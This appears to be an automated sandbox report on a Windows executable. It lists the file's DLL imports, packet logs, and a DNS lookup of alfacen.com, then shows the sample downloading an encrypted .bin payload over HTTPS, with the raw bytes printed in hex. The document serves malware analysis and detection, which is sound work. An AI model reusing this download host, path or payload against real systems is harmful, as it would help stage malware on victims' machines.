                                                RT_MANIFEST0x9e5c80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                Imports

                                                DLLImport
                                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 20, 2024 17:58:24.680136919 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:24.680197001 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:24.680279970 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:24.693173885 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:24.693196058 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:25.816365957 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:25.816476107 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:25.889065981 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:25.889127016 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:25.889461994 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:25.893028021 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:25.898695946 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:25.943411112 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.231201887 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.231235981 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.231326103 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.231345892 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.233017921 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.389780998 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.389905930 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.402545929 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.402631998 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.402932882 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.403419018 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.500889063 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.500992060 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.540868044 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.540975094 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.568733931 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.568821907 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.571852922 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.571923971 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.574285030 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.574363947 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.576348066 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.576419115 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.597790956 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.597944975 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.658461094 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.658539057 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.827584028 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.827724934 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.907340050 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.907491922 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.909204960 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.909399033 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.911382914 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.911470890 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.913454056 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.913539886 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.915146112 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.915219069 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.916872978 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.916939020 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.918632030 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.918828011 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.920344114 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.920442104 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.921917915 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.921983004 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.923458099 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.923542023 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.924207926 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.924278021 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.926162958 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.926230907 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.927086115 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.927155018 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:26.985213995 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:26.985349894 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.057085991 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.057187080 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.058031082 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.058104992 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.059659004 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.059729099 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.060605049 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.060669899 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.062629938 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.062700987 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.063502073 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.063568115 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.065359116 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.065433025 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.066169977 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.066231966 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.075084925 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.075145960 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:27.075165033 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.075210094 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.080794096 CEST49929443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:27.080809116 CEST44349929193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:37.123550892 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.123584986 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:37.123666048 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.124300003 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:37.124320030 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.220144033 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.220271111 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.220947027 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.220956087 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.221189976 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.221195936 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552139044 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552197933 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552227020 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.552247047 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.552265882 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.552309036 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.716852903 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.716985941 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.724363089 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.724455118 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.725524902 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.725608110 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.889137030 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.889282942 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.890130043 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.890221119 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.896019936 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.896115065 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.896852016 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.896943092 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.897838116 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.897917986 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:38.898745060 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:38.898822069 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.013526917 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.013612986 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.036331892 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.036408901 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.061754942 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.061842918 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.062711954 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.062968969 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.064307928 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.064376116 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.068392992 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.068481922 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.069433928 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.069502115 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.070445061 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.070523024 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.071201086 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.071271896 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.072246075 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.072312117 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.073191881 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.073271036 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.288995028 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.289020061 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.289211035 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.290419102 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.290498972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.291639090 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.291728973 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.292504072 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.292572975 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.294097900 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.294173002 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.295732021 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.295802116 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.296447039 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.296521902 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.297403097 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.297475100 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.298399925 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.298471928 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.299365044 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.299438953 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.300329924 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.300400972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.301304102 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.301376104 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.405173063 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.405297041 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.406152010 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.406230927 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407046080 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407120943 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407157898 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407216072 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407223940 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407268047 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.407326937 CEST44349982193.107.36.30192.168.2.4
                                                Oct 20, 2024 17:58:39.407378912 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.420449972 CEST49982443192.168.2.4193.107.36.30
                                                Oct 20, 2024 17:58:39.420460939 CEST44349982193.107.36.30192.168.2.4

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 20, 2024 17:58:24.579626083 CEST6159053192.168.2.41.1.1.1
                                                Oct 20, 2024 17:58:24.673593044 CEST53615901.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 20, 2024 17:58:24.579626083 CEST192.168.2.41.1.1.10xd36bStandard query (0)alfacen.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 20, 2024 17:58:24.673593044 CEST1.1.1.1192.168.2.40xd36bNo error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • alfacen.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449929193.107.36.304438124C:\Users\user\Desktop\3507071243740008011.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-20 15:58:25 UTC174OUTGET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
                                                User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: alfacen.com
                                                Cache-Control: no-cache
                                                2024-10-20 15:58:26 UTC344INHTTP/1.1 200 OK
                                                Date: Sun, 20 Oct 2024 15:58:26 GMT
                                                Server: Apache
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 289344
                                                Cache-Control: max-age=2592000
                                                Expires: Tue, 19 Nov 2024 15:58:26 GMT
                                                Vary: Accept-Encoding
                                                Content-Type: application/octet-stream
                                                2024-10-20 15:58:26 UTC7848INData Raw: cd c4 32 61 fb d9 39 26 04 dc 17 79 65 ca 29 f9 97 dd 2a 9a b8 89 1e 30 82 1c ed 54 4b 5b 59 50 43 1b 3e 16 de 3c 83 74 45 d7 49 8f ec 93 7d 4b f9 34 07 20 ec 59 fd ec d2 6a 68 e5 55 1a a8 9e f3 26 b7 d8 f2 e5 47 a6 b0 ef a9 72 9e 2c 15 36 ad b1 22 69 1c 60 5f 47 67 ca c0 68 2b b1 91 2c 64 63 6f 3e 1c 5b 83 a9 4e d8 89 f9 0a 8e c1 1c 94 ca cd 5c 2d 40 ea df cb 0a 1a 11 ae 05 80 bf a4 7b 92 db e1 77 7b 7d 33 4c 89 18 00 6f be 63 16 40 e7 3e 92 aa 31 1e 97 9a 40 64 dd f7 4b d2 7a 7e 16 c7 7e 1b fd d5 bf 2d f0 b6 8f 7c d7 e3 e5 9f 72 f9 1a 2d 97 87 ba cd 8c a0 37 b6 8f a7 c5 53 de f8 c1 c9 1f 16 ed 07 03 be df 8e f4 01 b8 d9 0f 67 da c6 aa 59 02 97 90 eb 6d be 80 65 00 b1 80 20 bd b9 14 16 7d ac da da d9 10 7f b7 79 37 a8 67 27 32 bb 0d d0 8b 05 ae 35 91 e9
                                                Data Ascii: 2a9&ye)*0TK[YPC><tEI}K4 YjhU&Gr,6"i`_Ggh+,dco>[N\-@{w{}3Loc@>1@dKz~~-|r-7SgYme }y7g'25
                                                2024-10-20 15:58:26 UTC8000INData Raw: a6 8f d8 ec 96 d4 b8 54 a0 f4 74 2d 1c cc d0 54 9d 3e 18 25 71 93 e2 95 6d 51 55 39 9f d1 58 41 03 08 63 34 52 e9 00 d5 87 e6 6b 60 ca 61 3d 86 1d f1 99 26 fb 55 f8 79 b7 67 fd 7d a5 5f 56 bf 1b 05 6e 8d 09 91 0b d1 b0 7d 87 f5 f5 a5 f5 d3 fc e3 58 7a fc 5e ce 13 22 9f 7e 3e 4a f8 4d cc 35 bc 5d 07 54 a4 02 18 30 08 1b e2 86 7b fd fe c1 14 91 06 ef 95 63 6a b0 24 b7 c2 d2 13 d4 f1 bb 7a 79 1d 31 a7 ad b9 13 b4 aa 9f 44 9d 5e 0c 9c 39 a3 47 c6 03 ef cf 21 7a 6a 82 60 73 e1 59 89 da 89 0d b2 a8 b1 72 77 d7 64 7c 08 01 73 29 c0 f2 09 d1 11 d9 e5 10 7d 38 ec e5 44 3c 82 7f fc a4 de de 04 ea bd 38 6a e5 f2 f8 bd 24 10 2a 1c 94 b6 58 84 3f f9 60 70 ee 62 42 c0 11 c6 ae 74 30 11 3e 44 ce a0 cf f9 35 9d 05 ac b0 ef ca c3 65 b8 bc 5f 7c 03 45 75 20 bc a6 eb 93 71
                                                Data Ascii: Tt-T>%qmQU9XAc4Rk`a=&Uyg}_Vn}Xz^"~>JM5]T0{cj$zy1D^9G!zj`sYrwd|s)}8D<8j$*X?`pbBt0>D5e_|Eu q
                                                2024-10-20 15:58:26 UTC8000INData Raw: 8a 0f de 8d 04 28 e2 44 15 95 50 b8 cd 9e 33 df 25 e4 23 bf c0 8a 9c 7d 51 0d bd 89 60 e0 fa 87 28 48 a7 c5 a2 5f ea 67 11 c5 df 21 b3 fa 14 01 f2 f7 47 7c 78 af ef b3 ff 31 38 16 45 82 db 1f d6 81 3c 04 dd 2e e4 7c df 5e 07 17 5c 0b bc 6e 55 53 fe df b8 f4 48 3d 49 ca 86 d5 6a 32 86 0f 68 85 00 48 88 6d 09 48 d3 19 e2 93 c1 d4 89 99 25 2e ee 8b 61 f0 2a a4 06 63 7d 13 c3 1a 71 cb 6f 2f 1b 84 4f 4f 5e 8f 78 be e5 d6 af 77 6b d5 41 e6 40 70 73 3a 93 6d 60 ab a1 a1 94 f2 b0 ad a2 42 6b ee e7 c8 18 ea 9f a6 f4 76 84 58 ca cd 48 03 d1 cb b8 83 91 7b 78 d4 2e 61 f6 d5 8e 08 a8 75 78 8e ad 46 7c a1 ba 4e 09 98 d6 44 33 d4 9d 34 56 89 6c f9 6a 03 03 d9 3d 7c a8 72 3d ab 13 64 9a a0 b2 6f 66 1f 52 ab 1b 13 f1 f3 19 2b 72 3c 08 89 c5 ce 8f 3b f7 74 96 88 cc 1e 21
                                                Data Ascii: (DP3%#}Q`(H_g!G|x18E<.|^\nUSH=Ij2hHmH%.a*c}qo/OO^xwkA@ps:m`BkvXH{x.auxF|ND34Vlj=|r=dofR+r<;t!
                                                2024-10-20 15:58:26 UTC8000INData Raw: ab c3 13 e3 29 6e cc ad 14 aa b0 1d 0e b1 7a 68 d1 d9 77 35 0c 2c 44 37 ff 7c e8 95 ab 0f 66 79 80 e8 e1 2e f5 dd 85 6e 5d f6 a8 b7 a4 81 a3 0c 8e 20 3f eb 42 59 58 85 f8 4d 55 9a 6c b6 33 24 05 42 9d 32 d0 22 57 38 70 3b 0f 3b 36 54 9a 6f 14 e8 74 c1 ca a9 e9 80 2c 91 2a ef 23 bd d8 8f 40 f5 46 de b1 cc 37 43 df 75 ec 4e c4 24 0c 2d 94 07 80 44 21 bc f3 48 86 52 d8 fa cf d0 ad 2d 5c 2e 6d 32 b9 98 6b 63 35 40 1a 2b c5 5a d1 91 0c e6 09 ad da f3 b2 0c d8 ab 9f 51 79 57 a7 6d c3 16 12 e8 dc b6 11 3c 3c 79 a4 45 e6 67 27 b5 31 91 da 60 6a 95 31 40 c0 37 65 58 a6 53 92 c3 8b 64 a3 78 4d f2 d8 f0 1e ce 28 c1 5b 9f b8 05 de 30 f6 18 5c 7e e8 90 ae f1 27 85 74 be 7f d2 e9 db 09 0a d6 fa 42 74 11 aa 9a d3 90 04 38 10 5c 12 f2 3a 4a 24 c2 48 4e 81 ed e1 bc 35 9e
                                                Data Ascii: )nzhw5,D7|fy.n] ?BYXMUl3$B2"W8p;;6Tot,*#@F7CuN$-D!HR-\.m2kc5@+ZQyWm<<yEg'1`j1@7eXSdxM([0\~'tBt8\:J$HN5
                                                2024-10-20 15:58:26 UTC8000INData Raw: 47 de ae 68 9d 98 9d e2 7c 07 d0 73 7b 88 9c 14 22 09 bb 87 6f 93 1e 6a 47 26 d4 9c f3 9f 58 5e fc d9 8a df 0e ef 64 60 ad b8 3e bf 08 2b d0 e3 85 07 66 52 4f 82 9f 3a 71 32 29 88 a4 89 12 03 c1 fd 66 25 3c 03 e4 9f 89 9f b4 24 c9 45 2d 21 10 bd 43 20 93 a6 50 01 f8 60 13 0a 65 7a 2d 85 64 86 6c 54 58 e5 54 26 81 03 1d f7 94 94 01 92 85 a6 b8 92 83 05 c0 60 8f 4f 87 67 db 0c d5 37 37 3c 0d 96 c4 87 fe e4 94 91 db 2c dc 78 b7 e7 a3 aa 2a 9f 31 51 9d 41 7f 79 fa 75 10 26 6d dd 6c c4 0a 96 f0 d7 57 89 32 51 fa c6 6a 97 8d 35 66 0d d9 a4 07 a1 fa 24 3d 5f 86 8c bf 2b 17 b3 96 4b 40 1f 2b 01 a3 52 ec bd bb 47 a6 94 3a 8d 27 ee 81 e3 ec 08 a8 19 9d 4f 42 35 bf d5 34 5b 6e 82 c4 7e 18 cc ba b1 b6 99 53 f7 e3 8b 81 01 b5 3b 75 06 85 94 70 f2 a0 d8 7b e7 f8 22 19
                                                Data Ascii: Gh|s{"ojG&X^d`>+fRO:q2)f%<$E-!C P`ez-dlTXT&`Og77<,x*1QAyu&mlW2Qj5f$=_+K@+RG:'OB54[n~S;up{"
